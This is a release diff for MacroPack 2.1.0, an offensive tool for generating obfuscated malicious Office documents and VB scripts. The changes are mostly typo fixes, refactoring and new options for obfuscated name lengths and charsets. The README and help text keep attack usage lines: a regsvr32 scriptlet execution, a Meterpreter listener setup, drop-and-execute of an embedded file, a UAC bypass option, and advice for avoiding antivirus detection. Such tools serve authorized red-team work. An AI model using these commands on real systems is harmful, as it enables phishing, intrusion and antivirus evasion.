Release of MacroPack 2.1.0

README.md

@@ -39,7 +39,7 @@ Note that the main goal of macro\_pack obfuscation is not to prevent reverse eng
 
 ### Generation
 
-Macro Pack can generate several kind of MS office documents and scripts formats.
+Macro Pack can generate several kinds of MS office documents and scripts formats.
 The format will be automatically guessed depending on the given file extension.
 File generation is done using the option --generate or -G.  
 Macro Pack pro version also allow to trojan existing Office files with option --trojan or -T
@@ -87,10 +87,10 @@ I know this will not prevent usage by malicious people and that is why all featu
 
 ### About pro mode...
 You may notice that not all part of macro\_pack is available. Only the community version is available online.
-Features in the pro version are really "weaponizing" the process and I do not want them available to all script kiddies out there.
+Features in the pro version are really "weaponizing" the process, and I do not want them available to all script kiddies out there.
 The pro mode includes features such as:
 * Advance antimalware bypass
-* Shellcode injection
+* Advanced Shellcode injection methods
 * Command line obfuscation (Dosfuscation)
 * ASR and AMSI bypass
 * Self unpacking VBA/VBS payloads
@@ -110,6 +110,7 @@ Some short demo videos are available on the [sevagas youtube channel](https://ww
 Note that MP pro is only available as a commercial offer for professionals.
 If you are in an offensive security audit team and would like more information on how to get "pro" version you can contact me at emeric.nasi[ at ]sevagas.com using your professional email address.
 
+**Important:** If you wish to contact me about MacroPack pro, use my emeric.nasi [at] sevagas.com email address. Also please note that I will not answer to anonymous inquiries for the Pro version. Only to professional emails.
 
 
 ## Run/Install
@@ -308,6 +309,10 @@ echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\us
 
  Security bypass options:
     -o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name)
+    --obfuscate-names-charset=<CHARSET> Set a charset for obfuscated variables and functions
+        Choose between: alpha, alphanum, complete or provide the list of char you want
+    --obfuscate-names-minlen=<len> Set min length of obfuscated variables and functions (default 8)
+    --obfuscate-names-maxlen=<len> Set max length of obfuscated variables and functions (default 20)
     --uac-bypass Execute payload with high privileges if user is admin. Compatible with most MacroPack templates
 
 
@@ -401,9 +406,8 @@ This template also generates a  meterpreter.rc file to create the Metasploit han
   -> Example: ```msfconsole -r meterpreter.rc``` 
 
 
-### EMBED_EXE    
-        
-Drop and execute embedded file.
+### EMBED_EXE          
+Drop and execute an embedded file.
 Combine with --embed option, it will drop and execute the embedded file with random name under TEMP folder.
  -> Example: ```macro_pack.exe  -t EMBED_EXE --embed=c:\windows\system32\calc.exe -o -G my_calc.vbs```  
 
@@ -422,31 +426,31 @@ The various features were tested against locally installed Antimalware solutions
 A majority of antivirus static will be evaded by the simple "obfuscate" option. However, as most free tools payloads are generally caught by behavioural anaysis such as AMSI.
 Features available in MacroPack pro mode generally permit full AV bypass including AMSI.
 
-**Warning:** Do not submit your samples to online scanner (ex VirusTotal), Its the best way to break your stealth macro.
+**Warning:** Do not submit your samples to online scanner (ex VirusTotal), It's the best way to break your stealth macro.
 I also suggest you do not submit to non reporting site such as NoDistribute. You cannot be sure what these sites will do with the data you submit. 
 If you have an issue with macro\_pack AV detection you can write to us for advice or submit an issue or pull request.
 
 
 ## Relevant resources
 
-Blog posts about hacking with MS Office, VBS, and other retro stuff security:
+Blog posts about MacroPack Pro:
+ - https://blog.sevagas.com/?Launch-shellcodes-and-bypass-Antivirus-using-MacroPack-Pro-VBA-payloads
  - https://blog.sevagas.com/?EXCEL-4-0-XLM-macro-in-MacroPack-Pro (Excel 4.0 payloads in MacroPack Pro)
  - https://blog.sevagas.com/?Advanced-MacroPack-payloads-XLM-Injection (XLM injection in MacroPack Pro)
+
+Blog posts about hacking with MS Office, VBS, and other retro stuff security:
+ - https://blog.sevagas.com/?Bypass-Windows-Defender-Attack-Surface-Reduction
  - https://subt0x11.blogspot.fr/2018/04/wmicexe-whitelisting-bypass-hacking.html
  - http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
  - http://blog.sevagas.com/?Hacking-around-HTA-files  (run hta code in non-hta files and hta polyglots)
- - http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html
  - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (About Dynamic Data Exchange attacks)
  - https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
- - https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/
 
  Other useful links:
  - https://github.com/p3nt4/PowerShdll (Run PowerShell with dlls only)
  - https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Run powershell script with PowerShdll VBA implementation)
- - https://enigma0x3.net/2016/03/15/phishing-with-empire/ (Generate Empire VBA payload)
  - https://github.com/EmpireProject/Empire
  - https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
- - https://www.metasploit.com/
  - https://github.com/Cn33liz/MacroMeter
  - https://github.com/khr0x40sh/MacroShop
  - https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
@@ -467,6 +471,6 @@ Emails:
 
 [The Apache License 2.0](https://www.apache.org/licenses/LICENSE-2.0.html)
 
-Copyright 2017,2018,2019,2020 Emeric “Sio” Nasi ([blog.sevagas.com](https://blog.sevagas.com))
+Copyright 2017,2018,2019,2020,2021 Emeric “Sio” Nasi ([blog.sevagas.com](https://blog.sevagas.com))
 
 

src/common/definitions.py

@@ -1,2 +1,2 @@
-VERSION="2.0.1-p1"
-LOGLEVEL = "INFO"
+VERSION="2.1.0"
+LOGLEVEL = "INFO"

src/common/help.py

@@ -50,7 +50,7 @@ def getToolPres():
  ```batch
 # 1 Generate obfuscated VBS scriptlet and Metasploit resource file based on meterpreter reverse HTTPS template
 echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.sct
-# 2 On attacker machinge Setup meterpreter listener
+# 2 On attacker machine Setup meterpreter listener
 msfconsole -r webmeter.rc
 # 3 run scriptlet with regsvr32 
 regsvr32 /u /n /s /i:meter.sct scrobj.dll
@@ -148,7 +148,7 @@ def getTemplateUsage(currentApp):
     return templatesInfo
 
 
-def getGenerationFunction(currentApp):
+def getGenerationFunction():
     details = """ Main payload generation options:
     -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the payload format based on extension.
         MacroPack supports most Ms Office and VB based payloads as well various kinds of shortcut files. 
@@ -164,9 +164,13 @@ def getGenerationFunction(currentApp):
     return details
 
 
-def getAvBypassFunction(currentApp):
+def getAvBypassFunction():
     details = """ Security bypass options: 
     -o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name)
+    --obfuscate-names-charset=<CHARSET> Set a charset for obfuscated variables and functions
+        Choose between: alpha, alphanum, complete or provide the list of char you want
+    --obfuscate-names-minlen=<len> Set min length of obfuscated variables and functions (default 8)
+    --obfuscate-names-maxlen=<len> Set max length of obfuscated variables and functions (default 20)
     --uac-bypass Execute payload with high privileges if user is admin. Compatible with most MacroPack templates """ 
     return details
 
@@ -191,7 +195,7 @@ def getOtherFunction(currentApp):
             In this case, windows or linux explorers will show the file named as: somethingath.jpg
     -l, --listen=ROOT_PATH\tOpen an HTTP server from ROOT_PATH listening on default port 80.
     -w, --webdav-listen=ROOT_PATH Open a WebDAV server on default port 80, giving access to ROOT_PATH.
-    --port=PORT Specify the listening port for HTTP and WebDAV servers.""" % (currentApp)
+    --port=PORT Specify the listening port for HTTP and WebDAV servers.""" % currentApp
     return details
 
 
@@ -203,7 +207,7 @@ def getCommunityUsage(currentApp):
 
 %s
 
-""" % (getGenerationFunction(currentApp), getAvBypassFunction(currentApp), getOtherFunction(currentApp))
+""" % (getGenerationFunction(), getAvBypassFunction(), getOtherFunction(currentApp))
     return details
 
 
@@ -231,7 +235,7 @@ def printAvailableFormats(banner):
         printAvailableFormatsPro()
 
 
-def printCommunityUsage(banner, currentApp, mpSession):
+def printCommunityUsage(banner, currentApp):
     print(colored(banner, 'green'))
     print(" Usage 1: echo  <parameters> | %s -t <TEMPLATE> -G <OUTPUT_FILE> [options] " %currentApp)
     print(" Usage 2: %s  -f input_file_path -G <OUTPUT_FILE> [options] " % currentApp)
@@ -252,7 +256,7 @@ def printCommunityUsage(banner, currentApp, mpSession):
 
 
 
-def printProUsage(banner, currentApp, mpSession):
+def printProUsage(banner, currentApp):
     print(colored(banner, 'green'))
     print(" Usage 1: echo  <parameters> | %s -t <TEMPLATE> -G <OUTPUT_FILE> [options] " %currentApp)
     print(" Usage 2: %s  -f input_file_path -G <OUTPUT_FILE> [options] " % currentApp)
@@ -267,7 +271,7 @@ def printProUsage(banner, currentApp, mpSession):
 %s
 %s
 
-""" % (getGenerationFunction(currentApp), getGenerationFunctionPro(), getAvBypassFunction(currentApp), getAvBypassFunctionPro(), getOtherFunction(currentApp), getOtherFunctionPro())
+""" % (getGenerationFunction(), getGenerationFunctionPro(), getAvBypassFunction(), getAvBypassFunctionPro(), getOtherFunction(currentApp), getOtherFunctionPro())
     details +="    -h, --help   Displays help and exit \n"
 
     print(details)
@@ -281,11 +285,9 @@ def printTemplatesUsage(banner, currentApp):
 
 
 
-def printUsage(banner, currentApp, mpSession):
+def printUsage(banner, currentApp):
     if MP_TYPE=="Pro":
-        printProUsage(banner, currentApp, mpSession)
+        printProUsage(banner, currentApp)
     else:
-        printCommunityUsage(banner, currentApp, mpSession)
-
-
+        printCommunityUsage(banner, currentApp)
 

src/common/mp_session.py

@@ -1,5 +1,6 @@
 #!/usr/bin/env python
 # encoding: utf-8
+import string
 
 from common.utils import MSTypes
 
@@ -15,23 +16,26 @@ def __init__(self, workingPath, version, mpType):
         self._outputFileType = MSTypes.UNKNOWN    
 
         # regular Attrs
-        self.uacBypass  = False
+        self.uacBypass = False
         self.obfuscateForm =  False
         self.obfuscateNames =  False
         self.obfuscateStrings =  False
         self.obfOnlyMain = False
         self.doNotObfConst = False
         self.ObfReplaceConstants = True
+
+        self.obfuscatedNamesMinLen = 8
+        self.obfuscatedNamesMaxLen = 20
+        self._obfuscatedNamesCharset = string.ascii_lowercase
 
         self.fileInput = None
         self.startFunction = None
         self.stdinContent = None
         self.template = None
         self.ddeMode = False # attack using Dynamic Data Exchange (DDE) protocol (see https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/)
         self.dosCommand = None
-        self.icon = "%windir%\system32\imageres.dll,67" # by default JPG immage icon
+        self.icon = "%windir%\system32\imageres.dll,67" # by default JPG image icon
 
-
         self.runTarget = None
         self.runVisible = False
         self.forceYes = False
@@ -63,3 +67,30 @@ def outputFilePath(self):
     def outputFilePath(self, outputFilePath):
         self._outputFilePath = outputFilePath
         self._outputFileType = MSTypes.guessApplicationType(self._outputFilePath)
+
+
+    """
+    https://docs.microsoft.com/en-us/office/vba/language/concepts/getting-started/visual-basic-naming-rules
+    Use the following rules when you name procedures, constants, variables, and arguments in a Visual Basic module:
+     - You must use a letter as the first character.
+     - You can't use a space, period (.), exclamation mark (!), or the characters @, &, $, # in the name.
+     - Name can't exceed 255 characters in length
+    """
+
+    @property
+    def obfuscatedNamesCharset(self):
+        return self._obfuscatedNamesCharset
+
+    @obfuscatedNamesCharset.setter
+    def obfuscatedNamesCharset(self, charset):
+        if charset == "alpha":
+            self._obfuscatedNamesCharset = string.ascii_lowercase
+        elif charset == "alphanum":
+            self._obfuscatedNamesCharset = string.ascii_lowercase + string.digits
+        elif charset == "complete":
+            self._obfuscatedNamesCharset = string.ascii_lowercase + string.digits + r"_"
+        else:
+            self._obfuscatedNamesCharset = charset
+
+
+

src/common/utils.py

@@ -38,6 +38,14 @@ def randomAlpha(length):
     return key
 
 
+def randomStringBasedOnCharset(length, charset):
+    """ Returns a random alphabetic string of length 'length' """
+    key = ''
+    for i in range(length): # @UnusedVariable
+        key += choice(charset)
+    return key
+
+
 def extractStringsFromText(text):      
     import re
     result = ""
@@ -49,7 +57,7 @@ def extractStringsFromText(text):
 
 
 def extractWordInString(strToParse, index):
-    """ Exract word (space separated ) at current index"""
+    """ Extract word (space separated ) at current index"""
     i = index
     while i!=0 and strToParse[i-1] not in " \t\n&|":
         i = i-1
@@ -64,7 +72,7 @@ def extractWordInString(strToParse, index):
 
 
 def extractPreviousWordInString(strToParse, index):
-    """ Exract the word (space separated ) preceding the one at current index"""
+    """ Extract the word (space separated ) preceding the one at current index"""
     # Look for beginning or word
     i = index
     if strToParse[i] not in " \t\n":
@@ -82,7 +90,7 @@ def extractPreviousWordInString(strToParse, index):
 
 
 def extractNextWordInString(strToParse, index):
-    """ Exract the word (space separated ) following the one at current index"""
+    """ Extract the word (space separated) following the one at current index"""
     # Look for beginning or word
     i = index
     while i!=len(strToParse) and strToParse[i] not in " \t\n&|":
@@ -99,7 +107,7 @@ def extractNextWordInString(strToParse, index):
 
 
 def getHostIp():
-    """ returne current facing IP address """
+    """ return current facing IP address """
     s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
     try:
         # doesn't have to be reachable
@@ -121,9 +129,9 @@ def getRunningApp():
 
 
 def checkIfProcessRunning(processName):
-    '''
+    """
     Check if there is any running process that contains the given name processName.
-    '''
+    """
     #Iterate over the all the running process
     for proc in psutil.process_iter():
         try:
@@ -132,7 +140,7 @@ def checkIfProcessRunning(processName):
                 return True
         except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):
             pass
-    return False;
+    return False
 
 
 
@@ -152,9 +160,9 @@ def yesOrNo(question):
 
 
 def forceProcessKill(processName):
-    '''
+    """
     Force kill a process (only work on windows)
-    '''
+    """
     os.system("taskkill /f /im  %s >nul 2>&1" % processName)
 
 
@@ -200,7 +208,7 @@ def getParamValue(paramArray, paramName):
 isBinaryString = lambda bytes: bool(bytes.translate(None, textchars))
 
 
-class MSTypes():
+class MSTypes:
     XL="Excel"
     XL97="Excel97"
     WD="Word"
@@ -235,12 +243,13 @@ class MSTypes():
     MSI="Installer"
     UNKNOWN = "Unknown"
 
-    WORD_AND_EXCEL_FORMATS = [ XL, XL97, WD, WD97] 
+    WORD_AND_EXCEL_FORMATS = [XL, XL97, WD, WD97]
     MS_OFFICE_BASIC_FORMATS =  WORD_AND_EXCEL_FORMATS + [PPT] 
-    MS_OFFICE_FORMATS = MS_OFFICE_BASIC_FORMATS + [ MPP, VSD, VSD97, ACC] # Formats supported by macro_pack
-    VBSCRIPTS_BASIC_FORMATS = [VBS, HTA, SCT, WSF ]
+    MS_OFFICE_FORMATS = MS_OFFICE_BASIC_FORMATS + [MPP, VSD, VSD97, ACC] # Formats supported by macro_pack
+    VBSCRIPTS_BASIC_FORMATS = [VBS, HTA, SCT, WSF]
     VBSCRIPTS_FORMATS = VBSCRIPTS_BASIC_FORMATS + [XSL]
     VB_FORMATS = VBSCRIPTS_FORMATS + MS_OFFICE_FORMATS
+    VB_FORMATS_EXT = VB_FORMATS + [VBA] # VBA format is non executable
 
     Shortcut_FORMATS = [LNK, GLK, SCF, URL, SETTINGS_MS, LIBRARY_MS, INF, IQY, SYLK, CHM, CMD, CSPROJ]
 
@@ -250,12 +259,12 @@ class MSTypes():
     PE_FORMATS = [EXE, DLL]
 
     # OrderedDict([("target_url",None),("download_path",None)])
-    EXTENSION_DICT = OrderedDict([ (LNK,".lnk"),( GLK,".glk"),( SCF,".scf"),( URL,".url"), (SETTINGS_MS,".SettingContent-ms"),(LIBRARY_MS,".library-ms"),(INF,".inf"),(IQY, ".iqy"),
+    EXTENSION_DICT = OrderedDict([(LNK,".lnk"),(GLK,".glk"),(SCF,".scf"),(URL,".url"), (SETTINGS_MS,".SettingContent-ms"),(LIBRARY_MS,".library-ms"),(INF,".inf"),(IQY, ".iqy"),
                                   (SYLK,".slk"),(CHM,".chm"),(CMD,".cmd"),(CSPROJ,".csproj"),
-                                  ( XL,".xlsm"),( XL97,".xls"),( WD,".docm"),
-                                  (WD97,".doc"),( PPT,".pptm"),( PPT97,".ppt"),( MPP,".mpp"),( PUB,".pub"),( VSD,".vsdm"),( VSD97,".vsd"),
-                                  (VBA,".vba"),( VBS,".vbs"),( HTA,".hta"),( SCT,".sct"),( WSF,".wsf"),( XSL,".xsl"),( ACC,".accdb"), ( ACC,".mdb" ),
-                                   (EXE,".exe"),( DLL,".dll"),(MSI,".msi")])
+                                  (XL,".xlsm"),(XL97,".xls"),(WD,".docm"),
+                                  (WD97,".doc"),(PPT,".pptm"),(PPT97,".ppt"),(MPP,".mpp"),( PUB,".pub"),( VSD,".vsdm"),(VSD97,".vsd"),
+                                  (VBA,".vba"),(VBS,".vbs"),(HTA,".hta"),(SCT,".sct"),(WSF,".wsf"),(XSL,".xsl"),(ACC,".accdb"), (ACC,".mdb"),
+                                   (EXE,".exe"),(DLL,".dll"),(MSI,".msi")])